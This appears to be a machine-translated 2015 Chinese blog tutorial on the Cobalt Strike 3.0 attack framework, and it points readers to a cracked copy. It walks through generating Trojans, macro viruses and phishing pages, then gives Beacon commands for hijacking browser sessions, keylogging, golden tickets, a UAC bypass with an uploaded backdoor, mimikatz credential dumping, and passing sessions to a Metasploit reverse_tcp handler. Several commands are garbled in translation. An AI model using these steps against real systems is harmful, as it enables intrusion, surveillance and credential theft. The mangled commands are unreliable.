Evi1cg · 2015/11/10 he pleases

0 x00 profile

Cobalt Strike is a framework penetration tool based on Metasploit GUI, integrating port forwarding, service scanning, automatic overflow, multi-mode port monitoring, WIN EXE Trojan generation, WIN DLL Trojan generation, Java Trojan generation, Office macro virus generation, Trojan binding; Phishing attacks include: site cloning, target information acquisition, Java execution, automatic browser attacks and so on. Cobalt Strike 3.0 no longer uses the Metasploit framework and is used as a standalone platform, which can of course be used in conjunction with Armitage. Here’s a cracked version:

Download address: Stamp me (verify its security)

Cobalt Strike 3.0 extends its powerful community server capabilities, allowing multiple attackers to connect to a community server at the same time to share attack resources and target information and sessions. Of course, before using Cobalt Strike, you need to install the Java environment. For details, go to [Java Language =” Environment Setup “][/ Java]/java3.

0 x01 run

Unlike previous versions of Cobalt Strike, Cobalt Strike3.0 requires that a community server be enabled to connect to Cobalt Strike3.0. Of course, this server can be placed in a public network environment, or in the environment where you want to build the service. Download Cobalt Strike and include the following files:

The key files are teamServer and cobaltstrike.jar. Place both files in the same directory on the server and run:

Cobaltstrike Sudo./ TeamServer 192.168.74.1 MSF3Copy the code

For ease of use, use a specific IP address instead of 0.0.0.0 or 127.0.0.1. If you have multiple network cards, use the same IP address you want. Msf3 is the password for connecting to the community server.

After the service runs, connect to the client:

Meancobaltstrike Java -xx :+ Introduction to siveheap -xx :+UseParallelGC -jar cobaltstrike. Jar $*Copy the code

Here, the IP address is the IP address of the server, the default port is 50050, the user name is optional, and the password is the password set before. Then connect, the verification window pops up, and click Yes to enter Cobalt Strike.

0x02 Listeners

To use Cobalt Strike, you need to create a Listener, go to Cobalt Strike->Listeners, and then click On Add to create your own Listeners. Cobalt Strike3.0 includes these Listeners

  • windows/beacon_dns/reverse_dns_txt
  • windows/beacon_dns/reverse_http
  • windows/beacon_http/reverse_http
  • windows/beacon_https/reverse_https
  • windows/beacon_smb/bind_pipe
  • windows/foreign/reverse_dns_txt
  • windows/foreign/reverse_http
  • windows/foreign/reverse_https
  • windows/foreign/reverse_tcp

Windows/Beacon * is the built-in module of Cobalt Strike, including DNS, HTTP, HTTPS, SMB listener, Windows/Foreign * is the external listener, namely MSF or Armitage listener. After selecting the listener, the host will automatically fill in the IP address for when we start the service, configure the listening port, and then save. The listener is created.

0x03 Attacks

Cobalt Strike is a new type of attack that allows you to set up your own listening Packages.

HTML Application generates malicious HTA Trojan files.

MS Office Macro generates Office Macro virus files.

Payload Generator Generates the Payload in various languages.

USB/CD AutoPlay generates Trojan files that run using AutoPlay;

Windows Dropper binder, capable of binding document classes;

Windows Executable generates Executable Exe Trojan horse;

Windows Executable(S) generates a stateless Executable exe Trojan horse.

Web Drive-by includes the following modules:

Manage Manages enabled Web services.

Clone Site, which can record data submitted by victims;

Host File provides a File to download and modify the Mime information;

PowerShell Web Delivery is similar to MSF web_delivery.

Phishing attacks using Java self-signed programs;

Smart Applet Attack Automatically detects and attacks Java versions earlier than Java 1.6.0_45 and earlier than Java 1.7.0_21.

The System Profiler is used to obtain System information such as System version, Flash version, browser version, etc.

Spear Phish is a module for mail phishing.

0x04 View

View module can be convenient for testers to View each module, the graphical interface can be convenient to see the victim machine information.

Applications Displays the application information of the victim’s machine;

Credentials Display the Credentials of the victim’s machine, facilitating subsequent penetration.

Downloads File download;

The Event Log can see the Event Log, clearly see the events of the system, and the team can chat here;

Keystrokes to view the Keystrokes;

Proxy Pivots Views Proxy information.

Screenshots view Screenshots;

Script Console is a place where you can load various scripts to enhance functionality.

Targets Checks the target.

Web Log Displays Web logs.

And the Reporting function is not introduced, mainly is used for Reporting.

0x05 Beacon

Beacon can choose whether to export the network through DNS or HTTP. You can even switch between HTTP and DNS when communicating with Beacon. It supports multi-host connection. After Beacon is deployed, submit a list of domain names or hosts to be connected back, and Beacon will poll through these hosts. The target network’s defense team must intercept all listed hosts before it can interrupt communication with its network.

After obtaining shell in various ways (such as directly running the generated EXE), beacon can be used. Right-click computer, Interact can open Beacon Console.

Type help at beacon to see detailed instructions:

beacon> help Beacon Commands =============== Command Description ------- ----------- browserpivot Setup a browser pivot session bypassuac Spawn a session in a high integrity process cancel Cancel a download that's in-progress cd Change directory checkin Call home and post data clear Clear beacon queue covertvpn Deploy Covert VPN client desktop View and interact with target's desktop dllinject Inject a Reflective DLL into a process download Download a file downloads Lists  file downloads in progress drives List drives on target elevate Try to elevate privileges execute Execute a program on target exit Terminate the beacon session getsystem Attempt to get SYSTEM getuid Get User ID hashdump Dump password hashes help Help menu inject Spawn a session in a specific process jobkill Kill a long-running post-exploitation task jobs List long-running post-exploitation tasks kerberos_ccache_use Apply kerberos ticket from cache to this session kerberos_ticket_purge Purge kerberos tickets from this session kerberos_ticket_use Apply kerberos ticket to this session  keylogger Inject a keystroke logger into a process kill Kill a process link Connect to a Beacon peer over SMB logonpasswords Dump credentials and hashes with mimikatz ls List files make_token Create a token to pass credentials mimikatz Runs a mimikatz command mkdir Make a directory mode dns Use DNS A as data channel (DNS beacon only) mode dns-txt Use DNS TXT as data channel (DNS beacon only) mode http Use HTTP as data channel mode smb Use SMB peer-to-peer communication net Network and host enumeration tool note Assign a note to this Beacon portscan Scan a network for open services powershell Execute a command via powershell powershell-import Import a powershell script ps Show process list psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host pth Pass-the-hash using Mimikatz pwd Print current directory rev2self Revert to original token rm Remove a file or folder rportfwd Setup a reverse port forward runas Execute a program as another user screenshot Take a screenshot shell Execute  a command via cmd.exe sleep Set beacon sleep time socks Start SOCKS4a server to relay traffic socks stop Stop SOCKS4a server spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into steal_token Steal access token from a process timestomp Apply timestamps from one file to another unlink Disconnect from  parent Beacon upload Upload a file wdigest Dump plaintext credentials with mimikatz winrm Use WinRM to spawn a session on a host wmi Use WMI to spawn a session on a hostCopy the code

You can view the usage mode of a module directly by using help, for example:

beacon> help browserpivot
Use: browserpivot [pid] [x86|x64]
     browserpivot [stop]    

Setup a Browser Pivot into the specified process. To hijack authenticated
web sessions, make sure the process is an Internet Explorer tab. These
processes have iexplore.exe as their parent process.    

Use "browserpivot stop" to tear down the browser pivoting sessions 
associated with this Beacon.
Copy the code

Here are a few fun features. In order to display the results quickly, you can set

beacon>sleep 0
Copy the code

0x051 Browserpivot

The user injects the victim’s browser process, then enables the HTTP proxy, which allows the user to log in to the victim’s web site.

Use the ps to find the browser process:

Injection process:

beacon> browserpivot 3452 x64
Copy the code

To set the local browser proxy:

When the victim logs in to a website account, the local browser also logs in to the website through the proxy:

Of course, when the attacker closes the browser, the proxy is invalid. To close the proxy, run the following command:

browserpivot stop
Copy the code

0x052 Socks

You can directly enable the Socks4A agent for Intranet penetration testing.

Open the socks

beacon>socks 9999
Copy the code

You can select one of these and right-click Pivoting->SOCKS Server to enable the SOCKS proxy with this computer.

Configure proxychains. Conf and add

Socks4 127.0.0.1 9999Copy the code

Then you can use various tools to do Intranet penetration through Proxychains.

Alternatively, directly open the Tunnel and use MSF, click View->Proxy Pivots, select Socks4a Proxy, and click Tunnel:

After copying, execute in MSF to enable the agent:

Close the socks

beacon>socks stop
Copy the code

0x053 Screenshot&Keylogger

The screenshot here can take a screenshot of the victim for a period of time, and the command is as follows:

beacon>screenshot [pid] <x86|x64> [run time in seconds]
Copy the code

or

beacon>screenshot
Copy the code

Then go to View->Screenshots and you can see Screenshots:

Keyloggers can be used as follows:

Use: keylogger [pid] <x86|x64>
Copy the code

Then open View->Keystrokes, you can see the result of Keystrokes:

If you don’t want to use the command line, you can directly select the victim computer and right-click ->Explore->Process List:

0x054 powershell-import

This feature is useful in post-penetration testing, where you can import various PowerShell penetration frameworks, such as Nishang’s PowerPreter, and execute directly:

beacon> powershell-import
Copy the code

Then select Powerpreter.psm1 in the file browser:

Or simply execute:

powershell-import [/path/to/local/script.ps1]
Copy the code

Import, and then you can use the various powerPreter modules.

To execute a module directly use the following command, for example:

beacon> powershell Check-VM
Copy the code

There was a brief introduction to PowerPreter in Zone, powerShell followed by the penetration framework PowerPreter.

0 x055 kerberos

There are three modules:

  • Kerberos_ccache_use: Imports tickets from the ccache file
  • Kerberos_ticket_purge: Clears tickets for the current session
  • Kerberos_ticket_use: Imports tickets from the ticket file

The way to obtain gold notes is to use mimikatz:

kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE
Copy the code

Cloud also has a related article on Kerberos, if you are interested, check it out:

  • Mimikatz in Intranet penetration
  • The golden key to domain penetration

This is said to be useful in domain penetration

0x056 BypassUAC

What, you can’t read the password? Try bypassuac

Direct execution

beacon> bypassuac
Copy the code

Now you can perform the operations that require the highest permissions.

This piece in the test of Win10 did not succeed, about Win10 bypassuac I also have relevant introduction in the blog, details: poke me

Here’s how to use the bypassuac Powershell script to get the highest permissions in Win10. Since Nishang’s Powershell script does not currently support Win10, a Powershell script that I modified is invoked – bypassuac.ps1 is used

Generate a beacon backdoor:

Upload backdoor:

beacon> cd E:
beacon> upload /Users/evi1cg/Desktop/test.exe 
Copy the code

Load powerShell implementation backdoor:

beacon> powershell-import /Users/evi1cg/Pentest/Powershell/MyShell/invoke-BypassUAC.ps1
beacon> powershell Invoke-BypassUAC -Command 'E:\test.exe'
Copy the code

Then he broke it:

Use the broken computer’s Beacon to read the password:

beacon> sleep 0
beacon> wdigest
Copy the code

beacon> hashdump
Copy the code

0x06 Interconnects with MSF

Cobalt Strike3.0 no longer uses the Metasploit framework as a standalone platform, so how do you get meterpreter through Cobalt Strike? Don’t worry, it can be done. First we use MSF reverse_TCP to enable listening mode:

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.74.1 lhost => 192.168.74.1 MSF exploit(handler) > set lport 5555 lport => 5555 MSF exploit(handler) > exploit-jCopy the code

Create a Windows/Foreign/Reverse_TCP Listener using Cobalt Strike:

IP is the IP address of MSF, and port is the port monitored by MSF. Then select the computer and right-click ->Spawn:

Select the listener you just created:

You can see that the meterpreter was successfully retrieved.

0 x07 summary

This test was carried out using Windows/beacon_HTTP/Reverse_HTTP. For specific DNS listener, please refer to luom’s Cobalt Strike team server building and DNS communication demonstration. This article only introduces some functions of Cobalt Strike. If there are any mistakes, please correct them. You can study other functions of Cobalt Strike by yourself. If possible, I will also supplement them. I hope it is useful to you.

This article was originally published by EVI1CG and first published by Black Cloud Drops